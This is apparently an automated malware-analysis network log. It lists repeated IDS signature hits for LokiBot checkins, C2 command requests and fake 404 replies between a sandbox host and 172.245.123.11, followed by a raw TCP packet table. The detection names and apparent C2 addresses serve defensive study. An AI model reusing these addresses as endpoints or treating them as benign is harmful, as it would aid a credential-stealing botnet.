                                                              2025-01-07T11:03:37.297198+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550119172.245.123.1180TCP
                                                              2025-01-07T11:03:37.301961+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550119TCP
                                                              2025-01-07T11:03:37.443278+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550120172.245.123.1180TCP
                                                              2025-01-07T11:03:37.443278+01002025381ET MALWARE LokiBot Checkin1192.168.2.550120172.245.123.1180TCP
                                                              2025-01-07T11:03:37.443278+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550120172.245.123.1180TCP
                                                              2025-01-07T11:03:37.932170+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550120172.245.123.1180TCP
                                                              2025-01-07T11:03:37.932170+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550120172.245.123.1180TCP
                                                              2025-01-07T11:03:37.940683+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550120TCP
                                                              2025-01-07T11:03:38.078880+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550121172.245.123.1180TCP
                                                              2025-01-07T11:03:38.078880+01002025381ET MALWARE LokiBot Checkin1192.168.2.550121172.245.123.1180TCP
                                                              2025-01-07T11:03:38.078880+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550121172.245.123.1180TCP
                                                              2025-01-07T11:03:38.582549+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550121172.245.123.1180TCP
                                                              2025-01-07T11:03:38.582549+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550121172.245.123.1180TCP
                                                              2025-01-07T11:03:38.582642+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550121TCP
                                                              2025-01-07T11:03:38.720674+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550122172.245.123.1180TCP
                                                              2025-01-07T11:03:38.720674+01002025381ET MALWARE LokiBot Checkin1192.168.2.550122172.245.123.1180TCP
                                                              2025-01-07T11:03:38.720674+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550122172.245.123.1180TCP
                                                              2025-01-07T11:03:39.249186+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550122172.245.123.1180TCP
                                                              2025-01-07T11:03:39.249186+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550122172.245.123.1180TCP
                                                              2025-01-07T11:03:39.253953+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550122TCP
                                                              2025-01-07T11:03:39.392736+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550123172.245.123.1180TCP
                                                              2025-01-07T11:03:39.392736+01002025381ET MALWARE LokiBot Checkin1192.168.2.550123172.245.123.1180TCP
                                                              2025-01-07T11:03:39.392736+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550123172.245.123.1180TCP
                                                              2025-01-07T11:03:39.917989+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550123172.245.123.1180TCP
                                                              2025-01-07T11:03:39.917989+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550123172.245.123.1180TCP
                                                              2025-01-07T11:03:39.918492+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550123TCP
                                                              2025-01-07T11:03:40.062714+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550124172.245.123.1180TCP
                                                              2025-01-07T11:03:40.062714+01002025381ET MALWARE LokiBot Checkin1192.168.2.550124172.245.123.1180TCP
                                                              2025-01-07T11:03:40.062714+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550124172.245.123.1180TCP
                                                              2025-01-07T11:03:40.576758+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550124172.245.123.1180TCP
                                                              2025-01-07T11:03:40.576758+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550124172.245.123.1180TCP
                                                              2025-01-07T11:03:40.577698+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550124TCP
                                                              2025-01-07T11:03:40.725262+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550125172.245.123.1180TCP
                                                              2025-01-07T11:03:40.725262+01002025381ET MALWARE LokiBot Checkin1192.168.2.550125172.245.123.1180TCP
                                                              2025-01-07T11:03:40.725262+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550125172.245.123.1180TCP
                                                              2025-01-07T11:03:41.226763+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550125172.245.123.1180TCP
                                                              2025-01-07T11:03:41.226763+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550125172.245.123.1180TCP
                                                              2025-01-07T11:03:41.232579+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550125TCP
                                                              2025-01-07T11:03:41.427015+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550126172.245.123.1180TCP
                                                              2025-01-07T11:03:41.427015+01002025381ET MALWARE LokiBot Checkin1192.168.2.550126172.245.123.1180TCP
                                                              2025-01-07T11:03:41.427015+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550126172.245.123.1180TCP
                                                              2025-01-07T11:03:41.941183+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550126172.245.123.1180TCP
                                                              2025-01-07T11:03:41.941183+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550126172.245.123.1180TCP
                                                              2025-01-07T11:03:41.945929+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550126TCP
                                                              2025-01-07T11:03:42.077854+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550127172.245.123.1180TCP
                                                              2025-01-07T11:03:42.077854+01002025381ET MALWARE LokiBot Checkin1192.168.2.550127172.245.123.1180TCP
                                                              2025-01-07T11:03:42.077854+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550127172.245.123.1180TCP
                                                              2025-01-07T11:03:42.582157+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550127172.245.123.1180TCP
                                                              2025-01-07T11:03:42.582157+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550127172.245.123.1180TCP
                                                              2025-01-07T11:03:42.586998+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550127TCP
                                                              2025-01-07T11:03:42.718228+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550128172.245.123.1180TCP
                                                              2025-01-07T11:03:42.718228+01002025381ET MALWARE LokiBot Checkin1192.168.2.550128172.245.123.1180TCP
                                                              2025-01-07T11:03:42.718228+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550128172.245.123.1180TCP
                                                              2025-01-07T11:03:43.230772+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550128172.245.123.1180TCP
                                                              2025-01-07T11:03:43.230772+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550128172.245.123.1180TCP
                                                              2025-01-07T11:03:43.230824+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550128TCP
                                                              2025-01-07T11:03:43.373897+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550129172.245.123.1180TCP
                                                              2025-01-07T11:03:43.373897+01002025381ET MALWARE LokiBot Checkin1192.168.2.550129172.245.123.1180TCP
                                                              2025-01-07T11:03:43.373897+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550129172.245.123.1180TCP
                                                              2025-01-07T11:03:43.883877+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550129172.245.123.1180TCP
                                                              2025-01-07T11:03:43.883877+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550129172.245.123.1180TCP
                                                              2025-01-07T11:03:43.889105+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550129TCP
                                                              2025-01-07T11:03:44.064476+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550130172.245.123.1180TCP
                                                              2025-01-07T11:03:44.064476+01002025381ET MALWARE LokiBot Checkin1192.168.2.550130172.245.123.1180TCP
                                                              2025-01-07T11:03:44.064476+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550130172.245.123.1180TCP
                                                              2025-01-07T11:03:44.565510+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550130172.245.123.1180TCP
                                                              2025-01-07T11:03:44.565510+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550130172.245.123.1180TCP
                                                              2025-01-07T11:03:44.570674+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550130TCP
                                                              2025-01-07T11:03:44.703993+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550131172.245.123.1180TCP
                                                              2025-01-07T11:03:44.703993+01002025381ET MALWARE LokiBot Checkin1192.168.2.550131172.245.123.1180TCP
                                                              2025-01-07T11:03:44.703993+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550131172.245.123.1180TCP
                                                              2025-01-07T11:03:45.213830+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550131172.245.123.1180TCP
                                                              2025-01-07T11:03:45.213830+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550131172.245.123.1180TCP
                                                              2025-01-07T11:03:45.219660+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550131TCP
                                                              2025-01-07T11:03:45.361356+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550132172.245.123.1180TCP
                                                              2025-01-07T11:03:45.361356+01002025381ET MALWARE LokiBot Checkin1192.168.2.550132172.245.123.1180TCP
                                                              2025-01-07T11:03:45.361356+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550132172.245.123.1180TCP
                                                              2025-01-07T11:03:45.873777+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550132172.245.123.1180TCP
                                                              2025-01-07T11:03:45.873777+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550132172.245.123.1180TCP
                                                              2025-01-07T11:03:45.873803+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550132TCP
                                                              2025-01-07T11:03:46.021356+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550133172.245.123.1180TCP
                                                              2025-01-07T11:03:46.021356+01002025381ET MALWARE LokiBot Checkin1192.168.2.550133172.245.123.1180TCP
                                                              2025-01-07T11:03:46.021356+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550133172.245.123.1180TCP
                                                              2025-01-07T11:03:46.508415+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550133172.245.123.1180TCP
                                                              2025-01-07T11:03:46.508415+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550133172.245.123.1180TCP
                                                              2025-01-07T11:03:46.515917+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550133TCP
                                                              2025-01-07T11:03:46.728055+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550134172.245.123.1180TCP
                                                              2025-01-07T11:03:46.728055+01002025381ET MALWARE LokiBot Checkin1192.168.2.550134172.245.123.1180TCP
                                                              2025-01-07T11:03:46.728055+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550134172.245.123.1180TCP
                                                              2025-01-07T11:03:47.253639+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550134172.245.123.1180TCP
                                                              2025-01-07T11:03:47.253639+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550134172.245.123.1180TCP
                                                              2025-01-07T11:03:47.258469+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550134TCP
                                                              2025-01-07T11:03:47.390462+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550135172.245.123.1180TCP
                                                              2025-01-07T11:03:47.390462+01002025381ET MALWARE LokiBot Checkin1192.168.2.550135172.245.123.1180TCP
                                                              2025-01-07T11:03:47.390462+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550135172.245.123.1180TCP
                                                              2025-01-07T11:03:47.940009+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550135172.245.123.1180TCP
                                                              2025-01-07T11:03:47.940009+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550135172.245.123.1180TCP
                                                              2025-01-07T11:03:47.940076+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550135TCP
                                                              2025-01-07T11:03:48.079188+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550136172.245.123.1180TCP
                                                              2025-01-07T11:03:48.079188+01002025381ET MALWARE LokiBot Checkin1192.168.2.550136172.245.123.1180TCP
                                                              2025-01-07T11:03:48.079188+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550136172.245.123.1180TCP
                                                              2025-01-07T11:03:48.599995+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550136172.245.123.1180TCP
                                                              2025-01-07T11:03:48.599995+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550136172.245.123.1180TCP
                                                              2025-01-07T11:03:48.604851+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550136TCP
                                                              2025-01-07T11:03:48.750749+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550137172.245.123.1180TCP
                                                              2025-01-07T11:03:48.750749+01002025381ET MALWARE LokiBot Checkin1192.168.2.550137172.245.123.1180TCP
                                                              2025-01-07T11:03:48.750749+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550137172.245.123.1180TCP
                                                              2025-01-07T11:03:49.272186+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550137172.245.123.1180TCP
                                                              2025-01-07T11:03:49.272186+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550137172.245.123.1180TCP
                                                              2025-01-07T11:03:49.306405+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550137TCP
                                                              2025-01-07T11:03:49.450939+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550138172.245.123.1180TCP
                                                              2025-01-07T11:03:49.450939+01002025381ET MALWARE LokiBot Checkin1192.168.2.550138172.245.123.1180TCP
                                                              2025-01-07T11:03:49.450939+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550138172.245.123.1180TCP
                                                              2025-01-07T11:03:49.952988+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550138172.245.123.1180TCP
                                                              2025-01-07T11:03:49.952988+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550138172.245.123.1180TCP
                                                              2025-01-07T11:03:49.953044+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550138TCP
                                                              2025-01-07T11:03:50.093929+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550139172.245.123.1180TCP
                                                              2025-01-07T11:03:50.093929+01002025381ET MALWARE LokiBot Checkin1192.168.2.550139172.245.123.1180TCP
                                                              2025-01-07T11:03:50.093929+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550139172.245.123.1180TCP
                                                              2025-01-07T11:03:50.591200+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550139172.245.123.1180TCP
                                                              2025-01-07T11:03:50.591200+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550139172.245.123.1180TCP
                                                              2025-01-07T11:03:50.596016+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550139TCP
                                                              2025-01-07T11:03:50.740699+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550140172.245.123.1180TCP
                                                              2025-01-07T11:03:50.740699+01002025381ET MALWARE LokiBot Checkin1192.168.2.550140172.245.123.1180TCP
                                                              2025-01-07T11:03:50.740699+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550140172.245.123.1180TCP
                                                              2025-01-07T11:03:51.248033+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550140172.245.123.1180TCP
                                                              2025-01-07T11:03:51.248033+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550140172.245.123.1180TCP
                                                              2025-01-07T11:03:51.252940+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550140TCP
                                                              2025-01-07T11:03:51.391659+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550141172.245.123.1180TCP
                                                              2025-01-07T11:03:51.391659+01002025381ET MALWARE LokiBot Checkin1192.168.2.550141172.245.123.1180TCP
                                                              2025-01-07T11:03:51.391659+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550141172.245.123.1180TCP
                                                              2025-01-07T11:03:51.922208+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550141172.245.123.1180TCP
                                                              2025-01-07T11:03:51.922208+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550141172.245.123.1180TCP
                                                              2025-01-07T11:03:51.922271+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550141TCP
                                                              2025-01-07T11:03:52.063134+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550142172.245.123.1180TCP
                                                              2025-01-07T11:03:52.063134+01002025381ET MALWARE LokiBot Checkin1192.168.2.550142172.245.123.1180TCP
                                                              2025-01-07T11:03:52.063134+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550142172.245.123.1180TCP
                                                              2025-01-07T11:03:52.591519+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550142172.245.123.1180TCP
                                                              2025-01-07T11:03:52.591519+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550142172.245.123.1180TCP
                                                              2025-01-07T11:03:52.591821+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550142TCP
                                                              2025-01-07T11:03:52.739569+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550143172.245.123.1180TCP
                                                              2025-01-07T11:03:52.739569+01002025381ET MALWARE LokiBot Checkin1192.168.2.550143172.245.123.1180TCP
                                                              2025-01-07T11:03:52.739569+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550143172.245.123.1180TCP
                                                              2025-01-07T11:03:53.254331+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550143172.245.123.1180TCP
                                                              2025-01-07T11:03:53.254331+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550143172.245.123.1180TCP
                                                              2025-01-07T11:03:53.254375+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550143TCP
                                                              2025-01-07T11:03:53.390870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550144172.245.123.1180TCP
                                                              2025-01-07T11:03:53.390870+01002025381ET MALWARE LokiBot Checkin1192.168.2.550144172.245.123.1180TCP
                                                              2025-01-07T11:03:53.390870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550144172.245.123.1180TCP
                                                              2025-01-07T11:03:53.917456+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550144172.245.123.1180TCP
                                                              2025-01-07T11:03:53.917456+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550144172.245.123.1180TCP
                                                              2025-01-07T11:03:53.917994+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550144TCP
                                                              2025-01-07T11:03:54.062572+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550145172.245.123.1180TCP
                                                              2025-01-07T11:03:54.062572+01002025381ET MALWARE LokiBot Checkin1192.168.2.550145172.245.123.1180TCP
                                                              2025-01-07T11:03:54.062572+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550145172.245.123.1180TCP
                                                              2025-01-07T11:03:54.583211+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550145172.245.123.1180TCP
                                                              2025-01-07T11:03:54.583211+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550145172.245.123.1180TCP
                                                              2025-01-07T11:03:54.588580+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550145TCP
                                                              2025-01-07T11:03:54.718933+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550146172.245.123.1180TCP
                                                              2025-01-07T11:03:54.718933+01002025381ET MALWARE LokiBot Checkin1192.168.2.550146172.245.123.1180TCP
                                                              2025-01-07T11:03:54.718933+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550146172.245.123.1180TCP
                                                              2025-01-07T11:03:55.236735+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550146172.245.123.1180TCP
                                                              2025-01-07T11:03:55.236735+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550146172.245.123.1180TCP
                                                              2025-01-07T11:03:55.236778+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550146TCP
                                                              2025-01-07T11:03:55.375592+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550147172.245.123.1180TCP
                                                              2025-01-07T11:03:55.375592+01002025381ET MALWARE LokiBot Checkin1192.168.2.550147172.245.123.1180TCP
                                                              2025-01-07T11:03:55.375592+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550147172.245.123.1180TCP
                                                              2025-01-07T11:03:55.875902+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550147172.245.123.1180TCP
                                                              2025-01-07T11:03:55.875902+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550147172.245.123.1180TCP
                                                              2025-01-07T11:03:55.875955+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550147TCP
                                                              2025-01-07T11:03:56.016359+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550148172.245.123.1180TCP
                                                              2025-01-07T11:03:56.016359+01002025381ET MALWARE LokiBot Checkin1192.168.2.550148172.245.123.1180TCP
                                                              2025-01-07T11:03:56.016359+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550148172.245.123.1180TCP
                                                              2025-01-07T11:03:56.528237+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550148172.245.123.1180TCP
                                                              2025-01-07T11:03:56.528237+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550148172.245.123.1180TCP
                                                              2025-01-07T11:03:56.533027+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550148TCP
                                                              2025-01-07T11:03:56.672622+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550149172.245.123.1180TCP
                                                              2025-01-07T11:03:56.672622+01002025381ET MALWARE LokiBot Checkin1192.168.2.550149172.245.123.1180TCP
                                                              2025-01-07T11:03:56.672622+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550149172.245.123.1180TCP
                                                              2025-01-07T11:03:57.196556+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550149172.245.123.1180TCP
                                                              2025-01-07T11:03:57.196556+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550149172.245.123.1180TCP
                                                              2025-01-07T11:03:57.201332+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550149TCP
                                                              2025-01-07T11:03:57.344266+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550150172.245.123.1180TCP
                                                              2025-01-07T11:03:57.344266+01002025381ET MALWARE LokiBot Checkin1192.168.2.550150172.245.123.1180TCP
                                                              2025-01-07T11:03:57.344266+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550150172.245.123.1180TCP
                                                              2025-01-07T11:03:57.860803+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550150172.245.123.1180TCP
                                                              2025-01-07T11:03:57.860803+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550150172.245.123.1180TCP
                                                              2025-01-07T11:03:57.865551+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550150TCP
                                                              2025-01-07T11:03:58.028337+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550151172.245.123.1180TCP
                                                              2025-01-07T11:03:58.028337+01002025381ET MALWARE LokiBot Checkin1192.168.2.550151172.245.123.1180TCP
                                                              2025-01-07T11:03:58.028337+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550151172.245.123.1180TCP
                                                              2025-01-07T11:03:58.560538+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550151172.245.123.1180TCP
                                                              2025-01-07T11:03:58.560538+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550151172.245.123.1180TCP
                                                              2025-01-07T11:03:58.565391+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550151TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jan 7, 2025 11:01:56.702167988 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:56.707652092 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:56.707762003 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:56.709935904 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:56.715365887 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:56.715462923 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:56.720684052 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.233551025 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.233760118 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.233864069 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.233864069 CET4970480192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.239015102 CET8049704172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.370863914 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.375690937 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.375869989 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.377790928 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.382538080 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.382608891 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.387432098 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.878271103 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.878315926 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.878406048 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.878504992 CET4970580192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.883248091 CET8049705172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.932229042 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.937218904 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.937314034 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.939043045 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.943845987 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:57.943922997 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:57.948779106 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:58.457973003 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:58.458090067 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:58.458123922 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:58.458168030 CET4970680192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:58.462835073 CET8049706172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:58.628519058 CET49707443192.168.2.5194.15.112.248
                                                              Jan 7, 2025 11:01:58.628551006 CET44349707194.15.112.248192.168.2.5
                                                              Jan 7, 2025 11:01:58.628613949 CET49707443192.168.2.5194.15.112.248
                                                              Jan 7, 2025 11:01:58.633692026 CET4970880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:58.639000893 CET8049708172.245.123.11192.168.2.5
                                                              Jan 7, 2025 11:01:58.639062881 CET4970880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:58.641072035 CET4970880192.168.2.5172.245.123.11
                                                              Jan 7, 2025 11:01:58.646289110 CET8049708172.245.123.11192.168.2.5
